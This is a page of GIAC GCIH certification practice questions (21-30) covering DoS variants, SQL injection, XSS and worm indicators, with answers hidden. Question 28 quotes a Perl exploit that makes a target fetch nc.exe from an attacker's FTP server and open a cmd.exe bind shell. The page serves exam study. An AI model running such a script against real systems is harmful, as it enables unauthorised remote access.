Pre-Summer Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: validbest

Pass the GIAC Security Administration GCIH Questions and answers with ValidTests

Exam GCIH All Questions
Exam GCIH Premium Access

View all detail and faqs for the GCIH exam

Viewing page 3 out of 10 pages
Viewing questions 21-30 out of questions
Questions # 21:

Maria works as a professional Ethical Hacker. She is assigned a project to test the security of www.we-are-secure.com. She wants to test a DoS attack on the We-are-secure server. She finds that the firewall of the server is blocking the ICMP messages, but it is not checking the UDP packets. Therefore, she sends a large amount of UDP echo request traffic to the IP broadcast addresses. These UDP requests have a spoofed source address of the We-are-secure server. Which of the following DoS attacks is Maria using to accomplish her task?

Options:

A.

Ping flood attack

B.

Fraggle DoS attack

C.

Teardrop attack

D.

Smurf DoS attack

Expert Solution
Questions # 22:

Adam works as a Network Administrator for PassGuide Inc. He wants to prevent the network from DOS attacks. Which of the following is most useful against DOS attacks?

Options:

A.

SPI

B.

Distributive firewall

C.

Honey Pot

D.

Internet bot

Expert Solution
Questions # 23:

Which of the following tools is an automated tool that is used to implement SQL injections and to retrieve data from Web server databases?

Options:

A.

Fragroute

B.

Absinthe

C.

Stick

D.

ADMutate

Expert Solution
Questions # 24:

The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?

Options:

A.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

B.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

C.

HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"

D.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Expert Solution
Questions # 25:

Which of the following is a reason to implement security logging on a DNS server?

Options:

A.

For preventing malware attacks on a DNS server

B.

For measuring a DNS server's performance

C.

For monitoring unauthorized zone transfer

D.

For recording the number of queries resolved

Expert Solution
Questions # 26:

Your network is being flooded by ICMP packets. When you trace them down they come from multiple different IP addresses. What kind of attack is this?

Options:

A.

Syn flood

B.

Ping storm

C.

Smurf attack

D.

DDOS

Expert Solution
Questions # 27:

Ryan, a malicious hacker submits Cross-Site Scripting (XSS) exploit code to the Website of Internet forum for online discussion. When a user visits the infected Web page, code gets automatically executed and Ryan can easily perform acts like account hijacking, history theft etc. Which of the following types of Cross-Site Scripting attack Ryan intends to do?

Options:

A.

Non persistent

B.

Document Object Model (DOM)

C.

SAX

D.

Persistent

Expert Solution
Questions # 28:

Adam, a malicious hacker performs an exploit, which is given below:

#####################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#####################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host –C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Options:

A.

Creates a share called "sasfile" on the target system

B.

Creates an FTP server with write permissions enabled

C.

Opens up a SMTP server that requires no username or password

D.

Opens up a telnet listener that requires no username or password

Expert Solution
Questions # 29:

Which of the following tools is used to download the Web pages of a Website on the local system?

Options:

A.

wget

B.

jplag

C.

Nessus

D.

Ettercap

Expert Solution
Questions # 30:

Which of the following characters will you use to check whether an application is vulnerable to an SQL injection attack?

Options:

A.

Dash (-)

B.

Double quote (")

C.

Single quote (')

D.

Semi colon (;)

Expert Solution
Viewing page 3 out of 10 pages
Viewing questions 21-30 out of questions